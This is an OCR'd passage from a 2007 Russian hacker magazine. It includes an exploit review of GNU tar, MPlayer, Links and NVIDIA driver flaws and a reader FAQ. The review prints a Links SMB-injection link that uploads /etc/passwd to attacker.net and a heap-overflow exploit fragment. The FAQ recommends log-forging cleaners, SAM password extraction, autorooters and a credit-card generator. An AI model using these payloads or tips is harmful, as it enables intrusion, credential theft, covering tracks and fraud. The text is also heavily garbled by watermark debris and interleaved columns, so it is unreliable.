Добавил:

Anonymhacker Опубликованный материал нарушает ваши авторские права? Сообщите нам.

Вуз:

Пензенский Государственный Университет

Предмет:

[НЕСОРТИРОВАННОЕ]

Файл:

098_Optimized

.pdf

Скачиваний:

Добавлен:

20.04.2024

Размер:

56.87 Mб

Скачать

☆

<<< < Предыдущая 1 2 3 4 5 67 / 177 8 9 10 11 12 13 14 15 16 17 > Следующая >>>

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang	e
			C		e	E
		X				E
	-						d
	F							t
	D							i
	D							r
P					NOW!			o
>> implantto BUY					NOW!
>> implantto BUY
w Click									m
w
	w							o
	.						.c
		p				g
			df		n		e
				-x cha

Полностью герметичный луноход NASA планирует ввести в 2027 году

CEV Orion доставляет лунный модуль

из строя ту или иную электронику на борту. Одинизспособовборьбыс пылью—нагретьлун- ныйгрунтдообразованиятвердойкорки, и тогда натакой«стеклянной» поверхностиастронавты смогутобосноватьсябезбоязнинахвататься пыли. Делов том, чтов реголитесодержитсямногожелезныхнаносфер, которыепри воздействии нанихмикроволновогоизлученияпрекрасно плавятся, образуятвердуюповерхность. Поэтому многие ученые предлагают снабдить излучателями-магнетронами лунную тележку и прокатить ее, как каток, по лунной поверхности. Она будет плавить и разглаживать верхний слой реголита, создавая плотные дорожки и площадки без пыли. А целая армия таких машин могла бы расплавить и превратить в гладкую вогнутую поверхность какой-нибудь кратер. Поставив в центр мачту

сприемником, мы получим радиотелескоп. С электростатикой же бороться труднее. На Земле инженеры просто сделали бы

заземление. Но на Марсе и Луне, где напрочь отсутствует влага, это не прокатит. На Луне придется закапывать в грунт большие листы алюминия или длинные петли алюминиевых проводов, которые и будут собирать лишний заряд. На Марсе же можно поступить

проще, сбрасывая электростатику в атмосферу

спомощью игл. На марсоходах уже ставят иглы, столь тонкие (0,02 миллиметра), что электричество сбегает по ним в марсианский воздух (громоотвод наоборот).

Но эффективнее был бы другой прибор

— крошечный радиоактивный источник, типа используемого в датчике дыма, который можно прикрепить к каждому скафандру и к базе. Аль- фа-частицы низкой энергии улетали бы в разреженную атмосферу, ионизируя ее

молекулы. Таким образом атмосфера непосредственно вокруг места деятельности людей стала бы электропроводной и нейтрализовывала бы лишний заряд — так предлагает поступить физик Джефри Лэндис из NASA.

Ученые надеются, что, научившись справляться с лунной пылью и ее вредным влиянием, человечество сможет увереннее посмотреть

в сторону Марса. Там существует аналогичная проблема, хотя состав пыли на Марсе и ее свойства несколько отличаются от лунных.

ВпередиМарс!

Итак, подготовив лунный плацдарм, NASA начинает ориентироваться на работу с Марсом. При тщательной подготовке лунной

миссии между высадкой на Луне и высадкой на Марсе может пройти от пяти до десяти лет. Оптимисты предлагают, что обе миссии будут осуществляться одновременно.

По мнению ученых MIT, для миссии на Марс оптимальным вариантом будет отправка CEV на орбиту вокруг Марса, где его должен ждать пустой меньший по размерам посадочный аппарат, прилетевший туда заранее. После стыковки астронавты перейдут в посадочный модуль и спустятся в нем на поверхность планеты. Возвращаясь обратно, они так же поднимутся на марсианскую орбиту, состыкуют-

Разведка боем — новый луноход

ся с CEV, перейдут в него и уже на нем прибудут на Землю.

Эта схема немного напоминает схему миссии «Apollo», но тогда весь набор модулей стартовал вместе. При нынешнем варианте не потребуется вновь создавать столь большие носители,

каким был «Saturn-5».

Не обойтись и без экзотики: есть проекты, рассчитанные на быстрые перелеты к Марсу. Так, используя двигатель на антиматерии, легкий пилотируемый корабль мог бы достичь Марса за 45-90 дней вместо полугода на CEV. Как бы там ни было, отправляться с «серьезными намерениями» к Марсу, не

«потренировавшись» на Луне, было бы слишком необдуманно, поэтому лунная миссия 2020-2030 годов станет именно такой тренировкой для человечества, своеобразной проверкой на прочность наших космических технологий. А вдруг эта проверка покажет, что в космос нам еще рановато? z

xàêåð 02 /98/ 07	/ 059

				hang		e
			C			e		E
		X						E
	-								d
	F									t
	D									i
	D									r
P					NOW!					o
P

w Click				to	BUY		>>
w Click											m
w
	w									o
	.								.c
		p						g
			df			n			e
				-xcha

взлом

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

Обзор
	Крис Касперски
	эксплойтов
	1
	2
	3
	4
	1
1	2	2
1	4	2
	3

/ 060

xàêåð 02 /98/ 07

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang	e
			C		e	E
		X				E
	-						d
	F							t
	D							i
	D							r
P					NOW!			o
>> взломto BUY					NOW!
>> взломto BUY
w Click									m
w
	w							o
	.						.c
		p				g
			df		n		e
				-x cha

Главная страница Mplayer'а

Links на моем рабочем столе

Здесь раздают обновленный tar

Удаленный

обходдиректорийв GNUtar

Brief

Teemu Salmela исследовал утилиту GNU tar,

ставшую стандартным архиватором для любого Linux/xBSD-дистрибутива, и обнаружил в ней дыру. Она похожа на ту, что была удалена из MS-DOS-версии pkzip'а много лет тому назад, представляя собой обход директо-

рий (directory traversal) или, говоря другими словами, возможности создания архива, распаковывающегося не в текущем каталоге, а там, где ему нужно, и затирающего все файлы, на которые у него только есть права. Даже если распаковка производится из-под простого пользователя (не root'a), угроза очень серьезна, а во всем виноват специальный тип файлов, определенный в tar'е артибутом GNUTYPE_NAMES, которому соответствует символ «N» в tar-заголовке. Эти файлы могут распаковываться в любое место файловой системы, и, хотя штатными средствами создать такой архив нельзя, это легко осуществить вручную, после чего остается только выложить его на общедоступный сервер или послать жертве вместе с утренним мылом. Подробнее

— наwww.securityfocus.com/bid/21235.

Targets

Уязвимость подтверждена в следующих вер-

сиях tar'а: 1.15.91, 1.16 и 1.15. Про остальные пока ничего неизвестно.

Exploit

Исходный текст вполне боевого exploit'а

лежит в архиве neohapsis'а: http://archives. neohapsis.com/archives/fulldisclosure/200611/0344.html

Solution

Извсехсоставителейдистрибутивовпокаодин лишьколлективFreeBSDвыпустилспециаль-

ныйпатч:http://security.freebsd.org/patches/ SA-06:26/gtar.patch.Остальныежепредпочли отделатьсямолчанием,недвусмысленно посылающимпользователейнаофициальную страничкуGNUtar'a(www.gnu.org/software/tar)

засвежейверсией1.16.1,изкоторойподдер жкаN-записейудалена,чтоделаетраспаковку такихархивоввообщеневозможной.

Удаленное

переполнениебуферав MPlayer'е

Brief

MPlayer—легендарныйи,в каком-тосмысле, культовыйаудио/видеоплеер,знаменитый, преждевсего,поддержкойогромногоколичествавходныхи выходныхформатовфайлов, кодеков,устройствввода/выводааудио-и видеоданных.Что самоеглавное,онподдерживаетихправильно(в частности,толькоонодин при кодированиивидеофильмовследитзасинхрометками).Это открытыйпроект,распространяющийсяв исходныхтекстахи портированныйподвесьзоопаркосей:Linux,xBSD,Solaris, IRIX,HP-UX,AIX,Win32,MacOSX,включаятакую экзотику,какQNXи Qmiga/MorphOS.Естес-

твенно,значительнаячастькодаMPlayer'а позаимствованаразработчикамиизсторонних открытыхпроектов,и потомуMPlayerзависит откачестваи надежностикаждогоихних, но качественныйкод—большаяредкость,

идырыобнаруживаютсятотуттотам.В данном случаевиновникомторжестваоказалсямодуль, обрабатывающийпотокиRealMediaRTSP

ирасположенныйв файлахstream/realrtsp/ asmrp.c,stream/realrtsp/asmrp.h

иstream/realrtsp/real.c,позаимствованных

избиблиотекиxine-lib.В ней28декабря2006 годабылаобнаруженауязвимость,связанная с традиционнымотсутствиемграницконтроля буфераи подробноописаннаяспециалиста-

миизDebianSecurityAdvisory:www.debian. org/security/2006/dsa-1244.

Targets

Уязвимость подтверждена в версиях MPlayer 1.0rc1 и SVN до r21799 (то есть до 31 декабря

13:27:53 2006 UTC). Более древние версии, повидимому, также содержат эту дыру, однако они не проверялись.

Exploit

Образец exploit'а может быть найден по сле-

дующей ссылке: http://cve.mitre.org/cgi-bin/ cvename.cgi?name=CVE-2006-6172.

Solution

РазработчикиMPlayer'аисправиликодв CVS (древеразработки),однакоещене перекомпилироваливыложенныедвоичныефайлы,предоставляяпользователямзамечательнуювозможность личнозанятьсясексомс компилятором.

Удаленное

выполнениеSMB-командв Links'e

Brief

Links — это шустрый текстовый браузер (широко известный в узких кругах), изначально реализованный на Linux'е, успешно портированный на кучу операционных систем всех мастей (xBSD, HPUX, OS/2, MacOSX, Win32) и породивший множество клонов.

В силу своей чрезвычайной конструктивной простоты и отсутствия поддержки скриптов

спрочими тяжеловесными элементами, долгое время (на пару с другим консольным браузером — Lynx) он по праву считался самым безопасным «судном» для web-сер- финга. Я активно пользовался им сам и даже рекомендовал его другим. Но вот на стыке 2006 и 2007 годов усилиями хакера Teemu Salmela в нем обнаружилась огромная дыра, позволяющая атакующему исполнять любые SMB-команды на машине жертвы, просматривающей зараженную HTML-страничку

спомощью Links'a (естественно, SMB-клиент должен быть установлен). Ошибка гнездится в функции smb_func(), расположенной

в файле smb.c.

Targets

Уязвимость подтверждена в версиях Links 1.00pre12 и ELinks 0.11.1, но и остальные версии также уязвимы.

Exploit

Линк, эксплуатирующий уязвимость:

smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd etc; put passwd ; exit;

Solution

Самое простое, что можно сделать, — отказаться от Links'а в пользу Lynx или же наложить заплатку, благо составители популярных дистрибутивов оперативно посуетились. Однако существует множество неофициальных билдов Links'а (и его собратьев), пользователям которых можно посоветовать закомментировать 162 ую строку и перекомпилировать код. Естественно, выполнение каких бы то ни было SMB-команд браузером после этого станет невозможным, ну да невелика потеря.

xàêåð 02 /98/ 07	/ 061

hang

NOW!

to BUY

>> взлом

to BUY

w Click

-xcha

-x cha

Переполнение

зашедшего на web-сервер с «троянской» стра-

Exploit

буферав драйверахNVIDIAдляLINUX

ничкой.Технические подробности можно найти

Исходный текст демонстрационного exploit'а

на www.securityfocus.com/bid/20559/info.

с shell-кодом на борту лежит по адресу

Brief

http://download2.rapid7.com/r7-0025/nv_exploit.c,

Раз уж этот обзор explot'ов оказался стихийно

Targets

а ниже приведен его ключевой фрагмент:

посвящен Linux-программам (причем безо

NVIDIA официально подтверждает уяз

всякого умысла с моей стороны, просто так

вимость двух следующих версий Linux-

Ключевойфрагментexploit'а,атакую-

получилось), будет уместно рассказать о дыре

драйверов: 1.0-8762 и 1.0-8774, утверждая,

щегоуязвимыедрайверыотNVIDIA

в «фирменных» драйверах от NVIDIA, выпу-

что более ранние версии (такие, например,

XGlyphInfo * glyphs;

щенных в виде двоичных файлов без исходных

как 1.0-8178 или 1.0-7184) не содержат

XRenderPictFormat fmt;

текстов. Увы! Закрытые продукты встречаются

этой дыры, а начиная с версии 1.0-8776,

XRenderPictFormat *mask = 0;

и в Linux, причем качество большинства из

она уже исправлена: http://nvidia.custhelp.

GlyphSet gset; char * buf =0; int

них весьма невелико, а доработка «напиль-

com/cgi-bin/nvidia.cfg/php/enduser/std_adp.

offset, cr, numB; int xscreenpos =

ником» чрезвычайно затруднена — оно и по-

php?p_faqid=1971. Но различные незави-

32680;

нятно: в машинном коде разбирается далеко

симые эксперты подозревают, что и более

int magic_len= 2768 xscreenpos;

не каждый линуксоид. А вот Windows-хакеры

древние версии уязвимы тоже (в первую

int wr_addr_len = 3548; int wr_nop_

чувствуют себя как рыба в (мутной) воде — им

очередь подозрение падает на версии

len=200;

к этому не привыкать.

драйверов под Solaris и FreeBSD), однако

offset = gotaddr-(heapaddr-

Дыра выражается в виде традиционной

никто из них это не подтвердил proof-of-

0x2C0000);

ошибки переполнения и при благоприятном

concept exploit'ом, поэтому вопрос остается

offset += magic_len; glyphs = mallo

(для хакера) стечении обстоятельств позволя-

открытым. Тем временем компания Solaris

c(sizeof(XGlyphInfo)*3);

ет атакующему выполнять произвольный код

клятвенно заверяет, что на платформу SPARC

/* Payload glyph */

на целевой системе с наивысшими уровнем

эта угроза не распространяется, но x86-

glyphs[0].width=0x4000; // one

привилегий, причем атака может быть осу-

64 версии драйверов все-таки уязвимы:

contiguous buf of 16K... way more

ществлена не только локально, но и удаленно

http://sunsolve.sun.com/search/document.

than necessary

— через remote X-клиента или X-клиента,

do?assetkey=1-26-102693-1&searchclause=.

glyphs[0].height = 1; glyphs[0].

/ 062

xàêåð 02 /98/ 07

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
взлом					BUY
взлом				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

	Отсюда NVIDIA раздает свои драйверы для Linux-систем	NVIDIA подтверждает наличие дыры и обещает в будущих
	Отсюда NVIDIA раздает свои драйверы для Linux-систем	версиях драйверов все исправить
		версиях драйверов все исправить

yOff = 0; glyphs[0].xOff = glyphs[0].width; glyphs[0].x = 0; glyphs[0].y = 0; xglyphids[0] = 'A'; xglyphids[1] = 'B'; xglyphids[2] = 'C'; int stride = ((glyphs[0]. width*1)+3)&~3; /* Needs to be DWORD aligned */ int bufsize = stride*glyphs[0]. height; buf = malloc(bufsize); /* Write the NOP instructions until wr_nop_len */ memset(buf+wr_addr_len, 0x90 /* NOP */, wr_nop_len); /* Calculate the number of B's required to send */ numB = offset / (glyphs[1].yOff * magic_len); /* Now create a new buffer for the string data */ string = malloc(numB+1/*numC*/+1/ *numA*/+1/*NULL*/); for (cr=0; cr<numB; cr++) string[cr]='B';string[cr] ='C';cr++; string[cr]='A'; cr++;string[cr]=0; mask = XRenderFindFormat(display, PictFormatType|PictFormatDepth, &fmt, 0); gset = XRenderCreateGlyphSet(displ ay, mask); /* END HEAP OVERFLOW SETUP CODE */

Solution Для предотвращения внедрения достаточно отключить акселератор рендеринга через опцию RenderAccel в конфигурации X-сервера или же

скачать (и установить) обновленные версии драйверов:

•http://download.nvidia.com/XFree86/Linux- x86_64/1.0-8776/NVIDIA-Linux-x86_64-1.0- 8776 pkg2.run (для Linux 8762);

•http://download.nvidia.com/XFree86/Linux- x86_64/1.0-8776/NVIDIA-Linux-x86_64-1.0- 8776 pkg2.run (для Linux 8774);

•www.nvidia.com/object/linux_display_amd64_ 1.0-8776.html (инструкции по установки драйверов под Linux);

•www.sun.com/desktop/workstation/ultra20/ downloads.jsp (для Solaris Ultra 20, Ultra 20M2);

•www.sun.com/desktop/workstation/ultra40/ downloads.jsp (для Solaris Ultra 40).

Fulldisclose История эта началась в далеком 2004 году (по понятиям компьютерной безопасности, это практически целая вечность), перед самым Новым годом, когда на форумах возник всплеск сообщений о странном поведении Linux-сис- тем и внезапном крахе самых разнообразных иксовых приложений: FireFox, KDE и т.д. В частности, попытка выполнить следующий ниже код под Eclipse приводила к ошибке типа «Segmentation Fault» (https://bugs.eclipse. org/bugs/show_bug.cgi?id=87299):

Код,вызывающийпадениеEclipse for (int y = 0; y < 20000; y++) for (int x = 0; x < 10; x++ ) System.out.print(x);

Дальше — больше. Форумы оказались буквально затоплены сообщениями об ошибках, но виновника найти не удавалось. Подозрение

пало на X-сервер. В нем действительно обнаружилось несколько критичных ошибок, но после их исправления дело лучше не стало. Ситуация оставалась мрачной и напряженной. Fritti был первым, кому в июле 2006 года удалось воспроизвести ошибку, о чем он и отрапортовал на форуме www.nvnews.net/vbulletin/ showthread.php?p=931048. Как оказалось, чтобы вызвать крах системы следовало выполнить следующие «ритуальные» действия:

1.сходить по ссылке www.floriansprogramme. de.vu/tmp/crashGTK01.txt (безобидная програм-

ма на Питоне, вычисляющая число «пи» с охранительным количеством знаков после запятой и дописывающая эталонный результат к концу листинга, то есть очень-очень длинную строку);

2.копипастом перенести текст в graphedit;

3.выделить весь текст, включая эту самую длинную строку;

4.нажать клавишу «Backspace»;

5.оп-с, мы имеем крах, то есть это нас имеют, да еще как!

К сообщению был приложен «NVIDIA bug report log file» со всей информацией о памяти, регист-

рах и т.д. (www.nvnews.net/vbulletin/attachment. php?attachmentid=19192&d=1152258443), благо-

даря чему копании NVIDIA уже через несколько часов удалось воспроизвести и подтвердить ошибку, которую она пообещала исправить

в следующемрелизедрайверовверсии1.0-9xxx. Приэтомвсплылинекоторыетехническиеподробностиинцидента,скупоописанныекомпаниейна фирменномсайтеhttp://nvidia.custhelp.com/cgi-bin/ nvidia.cfg/php/enduser/std_adp.php?p_faqid=197.

Обновленные драйверы, действительно, вышли, но история на этом не закончилась, и дыры в них как были, так и остались, о чем в октябре

xàêåð 02 /98/ 07	/ 063

				hang		e
			C			e		E
		X						E
	-								d
	F									t
	D									i
	D									r
P					NOW!					o
P

w Click				to	BUY		>>
w Click											m
w
	w									o
	.								.c
		p						g
			df			n			e
				-xcha

взлом

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

		Итак, получив список глифов, которые
		требуется отрендерить, функция
		XRenderCompositeString8 через специаль-
		ный callback обращается к драйверу, и, если
		этот лист превышает размер выделенного
		буфера, наступает закономерный крах.
		Более детальные исследования показы-
		вают, что закрытый драйвер регистрирует
		функцию _nv000373X, поручая ей расчет
		границ BoxRec-области, необходимой для
		вмещения всех данных, выводимых на
		экран. Выделение памяти осуществляет-
		ся посредством функции Xalloc, а размер
		буфера определяется путем умножения
		ширины области рендеринга на ее высо-
		ту. Полученный буфер передается другой
		внутренней функции _nv000053X, которая
		последовательно проходит по всем глифам,
		копируя каждый в буфер, отталкиваясь от его
		положения на плоскости (xOff, yOff), а также
		от ширины (width) и высоты (height), пос-
		редством которых, она вычисляет следую-
		щую позицию в буфере. Однако проверка на
		выход за границы буфера, по обыкновению,
		не выполняется и происходит переполне-
		ние. Причем не простое, а очень даже спе-
		цифичное. Манипулируя значениями xOff,
		yOff, width и height, на которые атакующий
		может воздействовать явным образом, он
NVIDIA признает, что кругом была неправа		получает возможность записи произвольных
		данных/кода по произвольному адресу.
		Соль в том, что X-сервер получает список
2006 года и сообщила компания Rapid7, LLC	— текстовых символов и прочих шрифтов (glyph	глифов от X-клиента, который может быть как
Security Advisory (www.rapid7.com), специали-	rendering);	локальным, так и удаленным. Идея удаленных X-
зирующаяся, как и следует из ее названия, на	2. список глифов, поступающих на отрисовку,	клиентов возникла в те далекие времена, когда
информационной безопасности.	не сравнивается с размером выделенного	цветной монитор был огромной роскошью и да-
В пресс-релизе, датированном 16 октября 2006	буфера;	же зажиточные организации с трудом позволя-
года (http://download2.rapid7.com/r7-0025), она	3. если список глифов превышает заранее	ли себе его иметь в количестве «одна штука»,
не только сообщила массу технических подроб-	заданный максимальный размер временного	а рабочих станций, как правило, было намного
ностей, но и привела исходный код proof-of-	буфера, наступает его переполнение и... все!	больше одной. Вот и пришлось разрабатывать
concept exploit'а, демонстрирующий механизм	На самом деле, никакое это не все, а только	механизмы удаленного вывода графической
локального и удаленного заброса shell-кода на	начало детективного расследования. В дейс-	информации на терминал. Сейчас же это ру-
атакуемый компьютер.	твительности, существует 2 семейства NVIDIA-	димент, практически никем не используемый,
Компания NVIDIA признала себя виновной	драйверов для Linux — с открытым и закрытым	но по целому ряду причин сохранившийся даже
по всем статьям, выпустив спустя 4 дня ответ-	кодом. Закрытые драйверы отличаются тем, что	в современных версиях никсов.
ный пресс-релиз, который одни хакеры сочли	поддерживают различные режимы акселерации	ВролиудаленногоX-клиентаможетвыступать
неубедительным оправданием, другие — недо-	(которые в отрытой версии напрочь отсутс-	практическилюбаяиксоваяпрограмма,взаимо-
статочно искренним раскаянием: http://nvidia.	твуют), в том числе и рендеринг шрифтов (ну,	действующаяс сетью,напримерFireFox,которо-
custhelp.com/cgi-bin/nvidia.cfg/php/enduser/	в смысле, глифов), реализованный в расши-	мускормилислишкомдлиннуютекстовуюстроку
std_adp.php?p_faqid=1971.	рении XRender, экспортирующем функцию	(вродетой,чтобыланастраничкес числом«пи»).
Главноето,чтонам,наконец,сталоизвестно,	XRenderCompositeString8, которая в тесной	Причемсовершенноне обязательнопропи-
почемувозникаетпереполнение.Есливерить	координации с X-сервером выводит шрифты на	сыватьэтустрокув HTML'е«прямымтекстом».
NVIDIA(а не веритьейу насникакихповодов	экран.	СойдетJavaилилюбойдругойскриптовыйязык.
вродебынет),делаобстоятприблизительнотак:	Именно поэтому дефект реализации XRender'а	Так что угроза не мифический призрак, а вполне
1. изсистемнойпамятивыделяетсявременный	долгое время считали ошибкой X-сервера (как	реальный и очень злобный монстр, поражаю-
буфер(scratchbuffer)фиксированногоразмера	говорится, искали в черной комнате черную	щий всех тех, кто не отключил акселерацию или
(clampedtoa maximumsize)дляотрисовкиглифов	кошку, которой там нет).	не обновился. z

/ 064	xàêåð 02 /98/ 07

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

hang

NOW!

w Click

to BUY

>> взлом

-xcha

Иван СкляроВ

				han		g	e
			C				e	E
		X						E
	-								d
	F									t
	D									i
	D									r
P										o
P					BUY		NOW!
							NOW!
				to
w Click				to							m
w Click											m
w
	w									o
	.								.c
		p						g
			df				n		e
				-x cha

sklyaroff@mail.ru www.sklyaroff.ru

faq you faqing faq 3

P Q: Что такоеMIM-атака?

P A: Аббревиатура MIM, или MITM, происходит от английского Man- in-the-Middle, то есть «атака с человеком посередине». Суть MIM-атаки в том, что между двумя (или более) узлами, обменивающимися данными, вмешивается третья сторона, которая перехватывает, прослушивает или блокирует передачу информации. Существует множество разновидностей MIM-атак под различные среды передачи информации.

P Q: А можноконкретныйпримерMIM-атаки?

P A: Разумеется, можно, вот типичная MIM-атака — ARP Redirect (ARPspoofing). Суть ее состоит в следующем. Допустим, хакеру нужно перехватить трафик между узлами A и B в коммутируемой (построенной на свитчах) сети. Любой узел в сети Ethernet, посылая данные по какому-либо IP-адресу, должен знать также MAC-ад- рес своего собеседника. Поэтому каждая машина, перед тем как послать данные, всегда сначала просматривает свой ARP-кэш, в котором хранятся соответствия «IP-MAC», на наличие нужного MAC-адреса. Если такого соответствия не обнаруживается, узел посылает широковещательный ARP-запрос. Хакер может послать фальсифицированное ARP-сообщение узлу A, указав, что MAC-адрес машины хакера соответствует IP-адресу узла B. Узел A занесет эти сведения в свой ARP-кэш и, когда будет посылать пакеты узлу B, в реальности отправит их узлу хакера. Для полноценного двустороннего перехвата хакеру нужно проделать аналогичные действия с ARP-кэшем узла B. После этого весь трафик между узлами A и B будет идти через машину хакера. Хакеру необходимо периодически посылать фальсифицированные ARP-сообщения узлам A и B для обновления их ARP-таблиц, иначе они рано или поздно сформируют правильную таблицу.

P Q: Хочунаучиться

писатьэксплойты,чтодляэтогонужно?

P A: Во-первых, для этого нужна голова, а в ней — мозги. Во-вторых, необходимо выучить языки программирования Си и Ассемблер, разобраться с устройством операционных систем. Затем можно приступать к чтению специализированных статей и книг конкретно по программированию эксплойтов. Правда, на русском

P P

языке хороших мануалов по этому вопросу почти нет. Из книг могу посоветовать только свою собственную — «Программирование боевого софта под Linux» (Иван Скляров). В ней наиболее полная и детальная информация по программированию локальных и удаленных эксплойтов под ошибки переполнения буфера в стеке и куче, bss, форматной строки, но только под операционную систему Linux. Под Windows надо смотреть другие источники, либо ждать, пока я напишу «Программирование боевого софта под Windows».

Q: В чемсутьFTPBounceатаки?

A: FTP Bounce Attack (скрытая атака по FTP) — это применение FTP-сервера в качестве proxy для проведения атак на другие узлы с целью сокрытия своего местоположения. Основана эта возможность на использовании одной особенности FTP-серве- ров: после подключения к FTP-серверу клиент должен передать ему команду PORT с параметрами, указывающими, с каким IPадресом надо соединиться и какой порт открыть по этому адресу

— обычно этот порт и адрес соответствуют самой машине клиента. Однако вместо своего IP-адреса и порта на своей машине хакер может передать IP-адрес и TCP-порт машины-жертвы. Таким образом, например, можно выполнять анонимное сканирование портов машины-жертвы. Выполняя команду LIST, FTP-сервер попытается прочитать на ней текущий каталог, посылая на указанный в команде PORT порт назначения TCP SYN-запрос. Если порт на машине-жертве открыт, то на сервер приходит ответ TCP SYN АСК и FTP-клиент получает «150» и «226», если же порт за-

крыт, то — «425. Can't Build Data Connection: Connection Refused» («425. Невозможно установить соединение: в соединении отказано»). Далее в цикле FTP-серверу можно последовательно выдавать команды PORT и LIST и осуществлять сканирование разных портов. Подобным образом обходятся файрволы. К сожалению, в наше время не все FTP-серверы позволяют использовать этот метод.

Q:Что означаеттермин«ксорить»?

A:Ксорить — это выполнять логическую операцию XOR (исключающее ИЛИ), которая имеет следующую семантику:

/ 066	xàêåð 02 /98/ 07

hang

BUY

NOW!

w Click

-xcha

						hang	e
					C		e	E
				X				E
			-						d
			F							t
			D							i
			D							r
		P								o
>> взломto BUY							NOW!
>> взломto BUY											m
	w Click										m
	w
			w							o
			.						.c
				p				g
					df		n		e
						-x cha

0 xor 1 = 1

1 xor 0 = 1

0 xor 0 = 0

1 xor 1 = 0

Обычно эту операцию используют для простейшего шифрования. Я тебе советую заглянуть в мою книгу «Головоломки для хакера», там ты сможешь порешать кучу головоломок на дешифрование текстов с использованием XOR.

P Q: ПосоветуйлогклинерподLinux,которыйне просто

удаляетзаписиизutmp/wtmp/lastlog,а способенподменятьзаписинаподдельные.

P A: Пожалуйста: логклинер Mr-Lynd0v1_2.c способен подменять пользователей и хосты в логфайлах; mme.c позволяет подставлять записи с другого логина вместо реальных; nabi.c может подменять любые указанные данные в записях на новые. Ищи все эти и другие логклинеры на http://packetstormsecurity.org.

P Q: Как скопироватьSAM-файл?

P A: Напомню, что в файле SAM (Security Account Manager — дис-

петчер защиты учетных записей) хранятся учетные записи пользователей, содержащие в том числе имя пользователя и его пароль в Windows NT/2000/XP/2003. Этот файл распо-

ложен в каталоге %SystemRoot%\system32\config, но к нему нельзя получить доступ, пока Windows NT/2000/XP/2003 загружена, так как он постоянно открыт операционной системой для того, чтобы изменения становились доступны без перезагрузки компьютера. Поэтому можно поступить одним из следующих способов:

1.Если на компьютере установлена еще одна операционная система (например, Linux), то загрузиться с нее, выйти в нужный раздел и скопировать SAM-файл в другой каталог или на дискету/CD (кроме SAM, обычно нужно еще переписать файл SYSTEM из того же каталога).

2.Использовать с той же целью Live-CD (например, Knoppix).

3.Если Windows NT/2000/XP/2003 была установлена на файловую систему FAT (FAT32), то просто создать загрузочную дискету, загрузиться с нее и скопировать файл SAM в другой каталог или на дискету. Если Windows установлена на файловую систему NTFS, то для доступа к файлу SAM использовать дискету, созданную в программе NTFSDos Pro.

4.Иногда копия файла SAM хранится в каталоге %SystemRoot%\repair, из которого ее можно скопировать без перезагрузки.

Только зачем тебе копировать файл SAM? Если для того чтобы получить из него логины и пароли, то лучше сразу использовать одну из следующих программ: L0phtcrack 4, LCP (www.lcp.da.ru), Advanced NT Explorer (www.elcomsoft.com) или SAMInside (www.insidepro.com). Они позволяют расшифровать пароли без предварительного копирования файла SAM, в том числе на удаленном компьютере.

P Q: Что такоеAutorooter?

P A: Autorooter (от английского auto — автоматическийи root—права системногоадминистраторав UNIX-подобныхсистемах)

—это комплексизодногоилимножестваэксплойтови других боевыхутилит,такихкаксканерпортовилисканербезопасности.

Авторутеры могут быть выполнены в виде одного файла или множества связанных файлов. Они специально создаются хакерами для облегчения взлома серверов. Авторутер самостоятельно ищет в сети уязвимые машины, осуществляет их взлом и затем оповещает об этом своего хозяина. Осуществляя массовый автоматический взлом в сети, авторутер имеет еще одно название — massrooter (от английского mass — массовый). Массрутеры действуют во многом аналогично интернетчервям, но только находятся при этом под полным контролем хакера. Публичных массрутеров пока известно не очень много, но, очевидно, число их будет расти. Из тех, что доступны

в публичных интернет-архивах, можно назвать massroterfinal

от Daddy_cad, lpd autorooter от dave, OpenSSL-uzi от Harden и другие.Всехихможнонайтинаhttp://packetstormsecurity.org.

P Q: Подскажикакой-нибудьработающийгенераторно-

меровкредитныхкарт?

P A: Вот, пожалуйста: THC-Credit v1.91 от известной немецкой команды THC,онгенерируетабсолютноправильныеномеракредитных карт(Visa,Americanexpressи пр.).

Однатолькопроблемка—врядлиты в настоящеевремясможешь воспользоватьсяэтиминомерами,таккакпочтивезде,кроменомеров,требуетсяуказатьдатуокончаниясрокадействиякарты, имявладельцакредитнойкарты,напечатаннойнасамойкарте, CVC/CVV2 коди т.д.

Хотя, надо заметить, на сайтеwww.thc.org в Top 3 Downloaded Releases по количеству скачиваний генератор THC-Credit v1.91 до сих пор стоит на первом месте. И это несмотря на то, что программа была написана в 1999 году!

P Q: В чемсутьошибкиIntegerOverflowи существуютли

подэтуошибкуэксплойты?

P A: Суть ошибки Integer Overflow заключается в том, что в 32 битных системах значения переменных типа Integer могут лежать только

впределах от –2147483648 до 2147483647 (4 байта) или от 0 до 4294967295 для беззнаковых целых (Unsigned Integer). Если же

впеременную записать значение, превышающее максимально возможное число, поведение программы будет непредсказуемо и зависит от компилятора. Следующий пример в системе Linux после компиляции и исполнения выдает 0, хотя, по логике, должен выдавать 4294967296:

#include <stdio.h> int main() {

nt sum = 4294967295 + 1; printf("sum = %d\n", sum);

}

